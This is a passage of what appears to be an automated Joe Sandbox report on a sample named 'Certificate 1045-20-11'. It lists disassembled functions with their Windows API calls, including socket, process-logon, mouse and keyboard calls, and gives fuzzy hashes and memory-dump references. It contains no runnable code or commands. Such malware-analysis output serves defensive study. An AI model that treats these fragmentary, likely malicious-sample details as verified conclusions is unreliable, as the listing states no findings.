                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountMessagePostString
                                                                                • String ID:
                                                                                • API String ID: 650687236-0
                                                                                • Opcode ID: 9c2eb1c8d53fc820003ccdda124a5ab440c8323024dc2284fbe978ee47dd5e07
                                                                                • Instruction ID: 14b7136dfdbe4ac7dd95d73a67477fa741cfadd02b48d6c22297bb374e748433
                                                                                • Opcode Fuzzy Hash: 9c2eb1c8d53fc820003ccdda124a5ab440c8323024dc2284fbe978ee47dd5e07
                                                                                • Instruction Fuzzy Hash: 96518B31E00219EFEB11EFA8C845AAEB7B5FF59310F104469E905FB351DB30AE418BA5
                                                                                Function 00884AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00884B10
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00884B5B
                                                                                • IsMenu.USER32(00000000), ref: 00884B7B
                                                                                • CreatePopupMenu.USER32 ref: 00884BAF
                                                                                • GetMenuItemCount.USER32(000000FF), ref: 00884C0D
                                                                                • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00884C3E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                • String ID:
                                                                                • API String ID: 3311875123-0
                                                                                • Opcode ID: efa82d9a9301af66d16979e11cb47edd5b653c11971fd1d0b6a9a5968795b84e
                                                                                • Instruction ID: 1ee342213523dcf316f4dc6eeed8499f8b17af843d10ef64efe0e9ba7d469437
                                                                                • Opcode Fuzzy Hash: efa82d9a9301af66d16979e11cb47edd5b653c11971fd1d0b6a9a5968795b84e
                                                                                • Instruction Fuzzy Hash: 7B51ED7160130AEBDF20EFA8C888BADBBF9FF54318F145129E455DB291E3709944CB51
                                                                                Function 00898DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,008DDC00), ref: 00898E7C
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00898E89
                                                                                • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00898EAD
                                                                                • #16.WSOCK32(?,?,00000000,00000000), ref: 00898EC5
                                                                                • _strlen.LIBCMT ref: 00898EF7
                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00898F6A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$_strlenselect
                                                                                • String ID:
                                                                                • API String ID: 2217125717-0
                                                                                • Opcode ID: a4d1241fd3ec5d0db15c1ae7404ae00a27c0a8697847b8ace4a08a9953cc07b6
                                                                                • Instruction ID: 6ef3ad5d82307f6292a820c8bdbbf712494445bd40ad7888c4da18a0b87a9ae5
                                                                                • Opcode Fuzzy Hash: a4d1241fd3ec5d0db15c1ae7404ae00a27c0a8697847b8ace4a08a9953cc07b6
                                                                                • Instruction Fuzzy Hash: 7541C071500209ABCB04FBA8CD95EAEB7B9FF49314F144669F51AE7291DF30AE00CB61
                                                                                Function 0085ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085B34E: GetWindowLongW.USER32(?,000000EB), ref: 0085B35F
                                                                                • BeginPaint.USER32(?,?,?), ref: 0085AC2A
                                                                                • GetWindowRect.USER32(?,?), ref: 0085AC8E
                                                                                • ScreenToClient.USER32(?,?), ref: 0085ACAB
                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0085ACBC
                                                                                • EndPaint.USER32(?,?,?,?,?), ref: 0085AD06
                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008BE673
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                • String ID:
                                                                                • API String ID: 2592858361-0
                                                                                • Opcode ID: c27c115ada05b4a20449e9f66edbcff497696d437d60f09750a3e498b4778456
                                                                                • Instruction ID: 00dc9f76ed06c468dd8950af21f9836eda07944aedb4dea0ae6b45e9b4f57a47
                                                                                • Opcode Fuzzy Hash: c27c115ada05b4a20449e9f66edbcff497696d437d60f09750a3e498b4778456
                                                                                • Instruction Fuzzy Hash: 66417C711043019FC710EF28DC84FA67BF8FB69325F140669F9A5C72A1D731A849EB62
                                                                                Function 008AE397 Relevance: 9.1, APIs: 6, Instructions: 108windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShowWindow.USER32(00901628,00000000,00901628,00000000,00000000,00901628,?,008BDC5D,00000000,?,00000000,00000000,00000000,?,008BDAD1,00000004), ref: 008AE40B
                                                                                • EnableWindow.USER32(00000000,00000000), ref: 008AE42F
                                                                                • ShowWindow.USER32(00901628,00000000), ref: 008AE48F
                                                                                • ShowWindow.USER32(00000000,00000004), ref: 008AE4A1
                                                                                • EnableWindow.USER32(00000000,00000001), ref: 008AE4C5
                                                                                • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 008AE4E8
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Show$Enable$MessageSend
                                                                                • String ID:
                                                                                • API String ID: 642888154-0
                                                                                • Opcode ID: c1329e3927fd1c270e718d217f4b00551cfbfb4d1cf7f4d78fd0806c97e7ff3c
                                                                                • Instruction ID: f21897c97a4c194a47879fea7d792bf3b2bcc9d860898e87d7f7b4896231378c
                                                                                • Opcode Fuzzy Hash: c1329e3927fd1c270e718d217f4b00551cfbfb4d1cf7f4d78fd0806c97e7ff3c
                                                                                • Instruction Fuzzy Hash: AD414034602941EFEB21DF24C499F947BF5FB4A304F1845B9EA58CF6A2C731A841CB95
                                                                                Function 008898BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 008898D1
                                                                                  • Part of subcall function 0085F4EA: std::exception::exception.LIBCMT ref: 0085F51E
                                                                                  • Part of subcall function 0085F4EA: __CxxThrowException@8.LIBCMT ref: 0085F533
                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00889908
                                                                                • EnterCriticalSection.KERNEL32(?), ref: 00889924
                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0088999E
                                                                                • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 008899B3
                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 008899D2
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                • String ID:
                                                                                • API String ID: 2537439066-0
                                                                                • Opcode ID: 05980d3b130e1327583df5c2d26de33a1dbd95eca920b5a4b57cdb092615c8d7
                                                                                • Instruction ID: dda8eb4ec8e96ae392dbebb00d05977533af4472f15b8d05b2e8fc19f8e0dd4e
                                                                                • Opcode Fuzzy Hash: 05980d3b130e1327583df5c2d26de33a1dbd95eca920b5a4b57cdb092615c8d7
                                                                                • Instruction Fuzzy Hash: 0A316131900205ABDB10EFA8DC85EAEBB78FF44711B1480B9F904EB246E774DA14CBA5
                                                                                Function 00899B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(?,?,?,?,?,?,008977F4,?,?,00000000,00000001), ref: 00899B53
                                                                                  • Part of subcall function 00896544: GetWindowRect.USER32(?,?), ref: 00896557
                                                                                • GetDesktopWindow.USER32 ref: 00899B7D
                                                                                • GetWindowRect.USER32(00000000), ref: 00899B84
                                                                                • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00899BB6
                                                                                  • Part of subcall function 00887A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00887AD0
                                                                                • GetCursorPos.USER32(?), ref: 00899BE2
                                                                                • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00899C44
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                • String ID:
                                                                                • API String ID: 4137160315-0
                                                                                • Opcode ID: f91257a94824dd5e548e1b62e6f3182299e3cd4f3a5c0260167c907add4ee3f5
                                                                                • Instruction ID: a5d52e160cc4d5089e8ae75b54a825cf740fb31670da0b080bffcaa702b8d331
                                                                                • Opcode Fuzzy Hash: f91257a94824dd5e548e1b62e6f3182299e3cd4f3a5c0260167c907add4ee3f5
                                                                                • Instruction Fuzzy Hash: E431C172104315ABCB10EF58DC49F9AB7EDFF88314F04092AF599D7181D631E904CB92
                                                                                Function 0087AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0087AFAE
                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 0087AFB5
                                                                                • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 0087AFC4
                                                                                • CloseHandle.KERNEL32(00000004), ref: 0087AFCF
                                                                                • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0087AFFE
                                                                                • DestroyEnvironmentBlock.USERENV(00000000), ref: 0087B012
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                • String ID:
                                                                                • API String ID: 1413079979-0
                                                                                • Opcode ID: 27440063e29c191d48e3a6a42d310c4c428a9a3faceb9a4a13f0b9cbd6f449c8
                                                                                • Instruction ID: 3b868c4f4d90fce2256bef48e1a4b811a2d9d8902b0387ba29a71f42799c9729
                                                                                • Opcode Fuzzy Hash: 27440063e29c191d48e3a6a42d310c4c428a9a3faceb9a4a13f0b9cbd6f449c8
                                                                                • Instruction Fuzzy Hash: 49214C7210530DABDB029FA8DD09FAE7BA9FB84304F048025FA05E2161D776DD21EB61
                                                                                Function 008AEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0085AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0085AFE3
                                                                                  • Part of subcall function 0085AF83: SelectObject.GDI32(?,00000000), ref: 0085AFF2
                                                                                  • Part of subcall function 0085AF83: BeginPath.GDI32(?), ref: 0085B009
                                                                                  • Part of subcall function 0085AF83: SelectObject.GDI32(?,00000000), ref: 0085B033
                                                                                • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 008AEC20
                                                                                • LineTo.GDI32(00000000,00000003,?), ref: 008AEC34
                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 008AEC42
                                                                                • LineTo.GDI32(00000000,00000000,?), ref: 008AEC52
                                                                                • EndPath.GDI32(00000000), ref: 008AEC62
                                                                                • StrokePath.GDI32(00000000), ref: 008AEC72
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                • String ID:
                                                                                • API String ID: 43455801-0
                                                                                • Opcode ID: 138ab993961f2e36b6597232e4d393d223e2c6251eb953bf47730bbaea95f880
                                                                                • Instruction ID: 15513ab569af7e206205d28123f301723efad5f60e3dc43096c10e3b76d81f88
                                                                                • Opcode Fuzzy Hash: 138ab993961f2e36b6597232e4d393d223e2c6251eb953bf47730bbaea95f880
                                                                                • Instruction Fuzzy Hash: E2111B7200024DBFEF029F94DC88EEA7F6DFB08360F048126BE088A160D7719D55DBA0
                                                                                Function 0087E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 0087E1C0
                                                                                • GetDeviceCaps.GDI32(00000000,00000058), ref: 0087E1D1
                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0087E1D8
                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 0087E1E0
                                                                                • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0087E1F7
                                                                                • MulDiv.KERNEL32(000009EC,?,?), ref: 0087E209
                                                                                  • Part of subcall function 00879AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00879A05,00000000,00000000,?,00879DDB), ref: 0087A53A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                • String ID:
                                                                                • API String ID: 603618608-0
                                                                                • Opcode ID: f0ebb1c0eeb35ead1d71fc594a881bad2008533319a8dd0b387108643f4833c7
                                                                                • Instruction ID: 6a620ac920711c675259acdc7b7bdd9fc32bbbb4fb58156cb95bc5736dc99e91
                                                                                • Opcode Fuzzy Hash: f0ebb1c0eeb35ead1d71fc594a881bad2008533319a8dd0b387108643f4833c7
                                                                                • Instruction Fuzzy Hash: 340184B5A00714BFEB10ABA59C45F5EBFB8FB48351F008066EA08E7290D6709C00CBA0
                                                                                Function 00867B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __init_pointers.LIBCMT ref: 00867B47
                                                                                  • Part of subcall function 0086123A: __initp_misc_winsig.LIBCMT ref: 0086125E
                                                                                  • Part of subcall function 0086123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00867F51
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00867F65
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00867F78
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00867F8B
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00867F9E
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00867FB1
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00867FC4
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00867FD7
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00867FEA
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00867FFD
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00868010
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00868023
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00868036
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00868049
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0086805C
                                                                                  • Part of subcall function 0086123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0086806F
                                                                                • __mtinitlocks.LIBCMT ref: 00867B4C
                                                                                  • Part of subcall function 00867E23: InitializeCriticalSectionAndSpinCount.KERNEL32(008FAC68,00000FA0,?,?,00867B51,00865E77,008F6C70,00000014), ref: 00867E41
                                                                                • __mtterm.LIBCMT ref: 00867B55
                                                                                  • Part of subcall function 00867BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00867B5A,00865E77,008F6C70,00000014), ref: 00867D3F
                                                                                  • Part of subcall function 00867BBD: _free.LIBCMT ref: 00867D46
                                                                                  • Part of subcall function 00867BBD: DeleteCriticalSection.KERNEL32(008FAC68,?,?,00867B5A,00865E77,008F6C70,00000014), ref: 00867D68
                                                                                • __calloc_crt.LIBCMT ref: 00867B7A
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00867BA3
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                • String ID:
                                                                                • API String ID: 2942034483-0
                                                                                • Opcode ID: 635a12a73f0833bdc2ea39d91795b7c8a02fa0e44923eaea6dfb1e9df52f2cb2
                                                                                • Instruction ID: ca417a1a209fb7977e3902742d39178c4ebac9cad95df2990efa02916aeb9f3a
                                                                                • Opcode Fuzzy Hash: 635a12a73f0833bdc2ea39d91795b7c8a02fa0e44923eaea6dfb1e9df52f2cb2
                                                                                • Instruction Fuzzy Hash: 2EF0F03212C31219EA297B3C7C07A4A2781FF01B7CB3306A9F964C91E2FF21884181E2
                                                                                Function 008427EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0084281D
                                                                                • MapVirtualKeyW.USER32(00000010,00000000), ref: 00842825
                                                                                • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00842830
                                                                                • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0084283B
                                                                                • MapVirtualKeyW.USER32(00000011,00000000), ref: 00842843
                                                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 0084284B
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Virtual
                                                                                • String ID:
                                                                                • API String ID: 4278518827-0
                                                                                • Opcode ID: 3705c9e1d8291bd85d884168b8031a3635b93efb1e1a94cf8acf527386615788
                                                                                • Instruction ID: e3ecbe97953c458dd2cbc41e972fcf7bf240ce48d86b152b2bec77708855b594
                                                                                • Opcode Fuzzy Hash: 3705c9e1d8291bd85d884168b8031a3635b93efb1e1a94cf8acf527386615788
                                                                                • Instruction Fuzzy Hash: BB0167B0902B5ABDE3009F6A8C85B52FFB8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                Function 00889AD5 Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                • String ID:
                                                                                • API String ID: 1423608774-0
                                                                                • Opcode ID: 74900ee68aeb2f6e71b65d9572e6fd7da283c3b1d6aab6a6cfc1a595c0a11304
                                                                                • Instruction ID: ca7f84dbdb1195f88636410fe6579f531f145d96a6838027b1a95133be73fa0b
                                                                                • Opcode Fuzzy Hash: 74900ee68aeb2f6e71b65d9572e6fd7da283c3b1d6aab6a6cfc1a595c0a11304
                                                                                • Instruction Fuzzy Hash: F1013132242321ABD7197BA8EC89DFB7779FF88702B48053AF543D25A1DB74A801DB51
                                                                                Function 00887BF7 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00887C07
